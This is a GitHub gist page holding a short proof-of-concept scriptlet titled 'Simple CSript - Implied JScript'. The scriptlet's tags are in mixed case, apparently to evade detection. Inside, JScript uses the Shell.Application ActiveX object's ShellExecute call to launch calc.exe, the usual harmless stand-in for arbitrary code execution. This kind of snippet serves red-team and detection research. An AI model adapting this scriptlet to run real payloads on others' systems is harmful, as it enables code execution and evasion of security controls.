Skip to content

Instantly share code, notes, and snippets.

@benpturner
Last active March 28, 2019 00:00
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save benpturner/1fb011c84984af18e8b16fc22325a2e7 to your computer and use it in GitHub Desktop.
Save benpturner/1fb011c84984af18e8b16fc22325a2e7 to your computer and use it in GitHub Desktop.
Simple CSript - Implied JScript
<cOmPoNeNt><sCRipT>
a=new ActiveXObject("Shell.Application").ShellExecute("calc.exe","","","open","0");
</sCRipT></cOmPoNeNt>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment